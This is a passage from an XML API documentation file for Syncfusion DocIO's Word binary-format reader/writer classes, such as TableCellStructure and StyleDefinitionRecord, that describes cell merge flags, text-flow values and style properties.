             1 - The cell is one of a set of horizontally merged cells. It contributes its layout region to the set and its own contents are not rendered.
             2, 3 - The cell is the first cell in a set of horizontally merged cells. The contents and formatting of this cell extend into any consecutive cells following it that are designated as part of the merged set.
            
             B - textFlow (3 bits): A value from the TextFlow enumeration that specifies rotation settings for the text in the cell.
             Text Flow
             grpfTFlrtb - 0x0000 - Specifies the standard vertical text arrangement. The text block is not rotated. Multiple lines are arranged top to bottom. The characters on a line are laid out left to right.
             grpfTFtbrl - 0x0001 - Specifies a 90-degree clockwise rotation of the standard vertical text block. The lines in the block are vertical and arranged right to left. The characters on a line are rotated 90 degrees in a clockwise direction and laid out top to bottom.
             grpfTFbtlr - 0x0003 - Specifies a 90 degree, counter-clockwise rotation of the standard vertical text block. The lines in the block are vertical and arranged left to right. The characters on a line are rotated 90 degrees in a counter-clockwise direction and laid out bottom to top.
             grpfTFlrtbv - 0x0004 - Specifies the same line layout as grpfTFlrtb, however, each East Asian character is rotated 90 degrees in a counter-clockwise direction. All other text is not rotated.
             grpfTFtbrlv - 0x0005 - Specifies the same rotated line layout as grpfTFtbrl, however, each East Asian character is rotated 90-degrees in a counter-clockwise direction within the block, canceling out the rotation in grpfTFtbrl. All other text is left with the rotation found in grpfTFtbrl.
             
             C - vertMerge (2 bits): A value from the VerticalMergeFlag enumeration that specifies how this cell merges vertically with the cells above or below it.
             D - vertAlign (2 bits): A value from the VerticalAlign enumeration that specifies how contents inside this cell are aligned.
             E - ftsWidth (3 bits): An Fts value that specifies the unit of measurement for the wWidth field in the TC80 structure.
             F - fFitText (1 bit): Specifies whether the contents of the cell are to be stretched out such that the full cell width is used.
             G - fNoWrap (1 bit): When set, specifies that the preferred layout of the contents of this cell is as a single line and that cell widths can be adjusted to accommodate long lines. This preference is ignored when the preferred width of this cell is set to ftsDxa.
             H - fHideMark (1 bit): When set, specifies that this cell is rendered with no height if all cells in the row are empty.
             I - fUnused (1 bit): This bit MUST be ignored.
             </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.m_preferredWidth">
            <summary>
            Preferred cell width
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.m_brcTop">
            <summary>
            specification of the top border 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.m_brcLeft">
            <summary>
            specification of the left border 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.m_brcBottom">
            <summary>
            specification of the bottom border 
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.m_brcRight">
            <summary>
            specification of the right border 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.Clone">
            <summary>
            Clones the TableCellStructure instance.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.Parse(System.Byte[],System.Int32)">
            <summary>
            Parse the data strucure
            </summary>
            <param name="arrData">Bytes with data</param>
            <param name="iOffset">Offset</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.Save(System.Byte[],System.Int32)">
            <summary>
            Saves the data structure.
            </summary>
            <param name="arrData">The destination array.</param>
            <param name="iOffset">The offset.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.Length">
            <summary>
            Gets the size of the structure.
            </summary>
            <value>
            The length.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.RGF">
             <summary>
             Gets or sets the RGF.
             </summary>
             <value>
             The RGF.
             A - horzMerge (2 bits): A value that specifies how this cell merges horizontally with the neighbouring cells in the same row. This value MUST be one of the following.
             0 - The cell is not merged with the cells on either side of it.
             1 - The cell is one of a set of horizontally merged cells. It contributes its layout region to the set and its own contents are not rendered.
             2, 3 - The cell is the first cell in a set of horizontally merged cells. The contents and formatting of this cell extend into any consecutive cells following it that are designated as part of the merged set.
            
             B - textFlow (3 bits): A value from the TextFlow enumeration that specifies rotation settings for the text in the cell.
             Text Flow
             grpfTFlrtb - 0x0000 - Specifies the standard vertical text arrangement. The text block is not rotated. Multiple lines are arranged top to bottom. The characters on a line are laid out left to right.
             grpfTFtbrl - 0x0001 - Specifies a 90-degree clockwise rotation of the standard vertical text block. The lines in the block are vertical and arranged right to left. The characters on a line are rotated 90 degrees in a clockwise direction and laid out top to bottom.
             grpfTFbtlr - 0x0003 - Specifies a 90 degree, counter-clockwise rotation of the standard vertical text block. The lines in the block are vertical and arranged left to right. The characters on a line are rotated 90 degrees in a counter-clockwise direction and laid out bottom to top.
             grpfTFlrtbv - 0x0004 - Specifies the same line layout as grpfTFlrtb, however, each East Asian character is rotated 90 degrees in a counter-clockwise direction. All other text is not rotated.
             grpfTFtbrlv - 0x0005 - Specifies the same rotated line layout as grpfTFtbrl, however, each East Asian character is rotated 90-degrees in a counter-clockwise direction within the block, canceling out the rotation in grpfTFtbrl. All other text is left with the rotation found in grpfTFtbrl.
             
             C - vertMerge (2 bits): A value from the VerticalMergeFlag enumeration that specifies how this cell merges vertically with the cells above or below it.
             D - vertAlign (2 bits): A value from the VerticalAlign enumeration that specifies how contents inside this cell are aligned.
             E - ftsWidth (3 bits): An Fts value that specifies the unit of measurement for the wWidth field in the TC80 structure.
             F - fFitText (1 bit): Specifies whether the contents of the cell are to be stretched out such that the full cell width is used.
             G - fNoWrap (1 bit): When set, specifies that the preferred layout of the contents of this cell is as a single line and that cell widths can be adjusted to accommodate long lines. This preference is ignored when the preferred width of this cell is set to ftsDxa.
             H - fHideMark (1 bit): When set, specifies that this cell is rendered with no height if all cells in the row are empty.
             I - fUnused (1 bit): This bit MUST be ignored.
             </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.PreferredWidth">
            <summary>
            Gets or sets the preferred width of the cell.
            </summary>
            <value>
            The preferred width of the cell.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.BRCTop">
            <summary>
            Gets or sets the BRC top.
            </summary>
            <value>
            The BRC top.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.BRCLeft">
            <summary>
            Gets or sets the BRC left.
            </summary>
            <value>
            The BRC left.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.BRCBottom">
            <summary>
            Gets or sets the BRC bottom.
            </summary>
            <value>
            The BRC bottom.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellStructure.BRCRight">
            <summary>
            Gets or sets the BRC right.
            </summary>
            <value>
            The BRC right.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.IBaseStructure">
            <summary>
            Summary description for _BaseStructure.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.IBaseStructure.Length">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Constants">
            <summary>
            Summary description for _Constants.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Constants.FileCharPosSize">
            <summary>
            Size of the File Character position.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Constants.BytesInWord">
            <summary>
            Number of bytes in single word value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Constants.BytesInInt">
            <summary>
            Number of bytes in single int value.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Constants.DiskPageSize">
            <summary>
            Number of bytes in formatted disk page.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Constants.BytesInLong">
            <summary>
            Number of bytes in single long value.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.Constants.#ctor">
            <summary>
            To prevent creating instances of this class constructor was made private.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord">
            <summary>
            Base part of StyleDefinition.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_START_ID">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_MASK_ID">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_BIT_SCRATCH">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_BIT_INVALID_HEIGHT">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_BIT_HAS_UPE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_BIT_MASS_COPY">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_MASK_TYPE_CODE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_START_TYPE_CODE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_MASK_BASE_STYLE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_START_BASE_STYLE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_MASK_UPX_NUMBER">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_START_UPX_NUMBER">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_MASK_NEXT_STYLE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_START_NEXT_STYLE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_BIT_AUTO_REDEFINE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DEF_BIT_HIDDEN">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.m_basePart">
            <summary>
            Base part of the style definition.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.m_strStyleName">
            <summary>
            Names of the styles
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.m_aliasesStyleName">
            <summary>
            Names of the aliases styles (comma separated).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.m_arrUpx">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.m_chpx">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.m_papx">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.Parse(System.IO.Stream,System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord)">
            <summary>
            Extract record's fields from stream.
            </summary>
            <param name="stream">Stream with record's data.</param>
            <param name="iCount">Number of bytes that belongs the record.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
            <param name="info">Style sheet info.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.Clear">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.Save(System.IO.Stream)">
            <summary>
            Saves record into stream.
            </summary>
            <param name="stream">Stream to save record into.</param>
            <returns>Number of bytes in the written data.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.#ctor(System.String,System.UInt16,Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord)">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.#ctor(System.Byte[],System.Int32,System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="iCount">Number of bytes for the new record.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
            <param name="info"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.#ctor(System.IO.Stream,System.Int32,Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord)">
            <summary>
            Creates new record from stream.
            </summary>
            <param name="stream">Stream with record's data.</param>
            <param name="iCount">Number of bytes that belongs the record.</param>
            <param name="converter">MemoryConverter to convert array of bytes into structure.</param>
            <param name="info">Style sheet info.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.ParseUpxPart(System.Byte[],System.Int32)">
            <summary>
            Parses UPX part of the variable part.
            </summary>
            <param name="arrVariable"></param>
            <param name="iStartPos"></param>
            <param name="converter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.MakeEven(System.Int32)">
            <summary>
            Returns even number based on specified number.
            </summary>
            <param name="iStartPos"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.SaveUpxPart(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="converter"></param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.Tapx">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.StyleId">
            <summary>
            Invariant style identifier.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.IsScratch">
            <summary>
            Spare field for any temporary use, always reset back to zero!
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.IsInvalidHeight">
            <summary>
            PHEs of all text with this style are wrong.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.HasUpe">
            <summary>
            Indicates whether UPEs have been generated.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.IsMassCopy">
            <summary>
            std has been mass-copied; if unused at save time, style should be deleted.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.TypeCode">
            <summary>
            Style type code.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.BaseStyle">
            <summary>
            Base style.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.UPEOffset">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.UpxNumber">
            <summary>
            Number of UPXs (and UPEs).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.NextStyleId">
            <summary>
            Next style.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.IsAutoRedefine">
            <summary>
            Auto redefine style when appropriate
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.IsHidden">
            <summary>
            Indicates whether style is hidden from UI.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.StyleName">
            <summary>
            Names of the style
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.AliasesStyleName">
            <summary>
            Name of the Aliases Style Names (comma separated).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.PropertyExceptions">
            <summary>
            Returns array of Universal Property Exceptions. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.CharacterProperty">
            <summary>
            Returns array of Property Exceptions. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.ParagraphProperty">
            <summary>
            Returns array of Property Exceptions. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.UnderlyingStructure">
            <summary>
            Underlying structure.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.Length">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DBG_data">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DBG_data1">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DBG_data2">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.DBG_data3">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.LinkStyleId">
            <summary>
            Gets or sets the link style id.
            </summary>
            <value>The link style id.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.IsQFormat">
            <summary>
            Gets or sets a value indicating whether this instance is primary style.
            </summary>
            <value>
            	<c>true</c> if this instance is primary style; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.UnhideWhenUsed">
            <summary>
            Gets or sets a value indicating whether this instance is priority.
            </summary>
            <value>
            	<c>true</c> if this instance is priority; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.IsSemiHidden">
            <summary>
            Gets or sets a value indicating whether this instance is semi hidden.
            </summary>
            <value>
            	<c>true</c> if this instance is semi hidden; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleDefinitionRecord.UpxLength">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord">
            <summary>
            STSHI: STyleSHeet Information, as stored in a file
            Note that new fields can be added to the STSHI without invalidating
            the file format, because it is stored preceded by it's length.
            When reading a STSHI from an older version, new fields will be zero.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.DEF_BIT_STYLE_NAMES_WRITTEN">
            <summary>
            Bit index for StdStyleNamesWritten property.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.m_structure">
            <summary>
            Underlying structure.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.#ctor(System.UInt16)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord"/> class.
            </summary>
            <param name="iSTDBaseLength">Length of the i STD base.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.#ctor(System.Byte[])">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.#ctor(System.Byte[],System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.#ctor(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Creates new record from array of bytes, using specified memory provider.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset to the class data.</param>
            <param name="iCount">Number of bytes for the new record.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.#ctor(System.IO.Stream,System.Int32)">
            <summary>
            Creates new record from stream.
            </summary>
            <param name="stream">Stream with record's data.</param>
            <param name="iCount">Number of bytes to parse.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.Parse(System.Byte[],System.Int32,System.Int32)">
            <summary>
            Parses record.
            </summary>
            <param name="arrData">Data to parse.</param>
            <param name="iOffset">Offset in the data array to the records data.</param>
            <param name="iCount">Number of bytes to parse.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.StylesCount">
            <summary>
            Count of styles in stylesheet (cstd).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.STDBaseLength">
            <summary>
            Length of STD Base as stored in a file (cbSTDBaseInFile).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.IsStdStyleNamesWritten">
            <summary>
            Indicates whether built-in stylenames are stored.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.StiMaxWhenSaved">
            <summary>
            Max sti known when this file was written.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.ISTDMaxFixedWhenSaved">
            <summary>
            How many fixed-index istds are there?
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.BuiltInNamesVersion">
            <summary>
            Current version of built-in stylenames (nVerBuiltInNamesWhenSaved).
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.StandardChpStsh">
            <summary>
            ftc used by StandardChpStsh for this document. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.UnderlyingStructure">
            <summary>
            Underlying structure.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.Length">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.StyleSheetInfoRecord.FtcBi">
            <summary>
            Gets and sets the default bidi font name
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.SymbolDescriptor">
            <summary>
            Summary description for SymbolDescriptor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SymbolDescriptor.DEF_STRUCT_SIZE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.SymbolDescriptor.m_fontCode">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SymbolDescriptor.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SymbolDescriptor.Parse(System.Byte[])">
            <summary>
            
            </summary>
            <param name="operand"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.SymbolDescriptor.Save">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SymbolDescriptor.FontCode">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SymbolDescriptor.CharCode">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.SymbolDescriptor.CharCodeExt">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabDescriptor">
            <summary>
            Summary description for TabDescriptor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabDescriptor.DEF_TAB_LENGTH">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabDescriptor.m_jc">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabDescriptor.m_tlc">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabDescriptor.#ctor(System.Byte)">
            <summary>
            
            </summary>
            <param name="options"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabDescriptor.#ctor(Syncfusion.DocIO.DLS.TabJustification,Syncfusion.DocIO.DLS.TabLeader)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabDescriptor"/> class.
            </summary>
            <param name="justification">The justification.</param>
            <param name="leader">The leader.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabDescriptor.Save">
            <summary>
            Saves this instance.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabDescriptor.Justification">
            <summary>
            Gets or sets the justification.
            </summary>
            <value>The justification.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TabDescriptor.TabLeader">
            <summary>
            Gets or sets the tab leader.
            </summary>
            <value>The tab leader.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders">
            <summary>
            Summary description for TableBorders.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders.m_brcArr">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders.#ctor">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders.#ctor(Syncfusion.DocIO.ReaderWriter.Biff_Records.SinglePropertyModifierArray)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders"/> class.
            </summary>
            <param name="sprms">The single property modifier array.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders.Init">
            <summary>
            Initializes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders.Item(System.Int32)">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders.LeftBorder">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders.RightBorder">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders.TopBorder">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders.BottomBorder">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders.HorizontalBorder">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Biff_Records.TableBorders.VerticalBorder">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor">
            <summary>
            Summary description for TableCellDescriptor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Biff_Records.Structures.TableCellDescriptor.m_tableStruct">
            <summary>
            
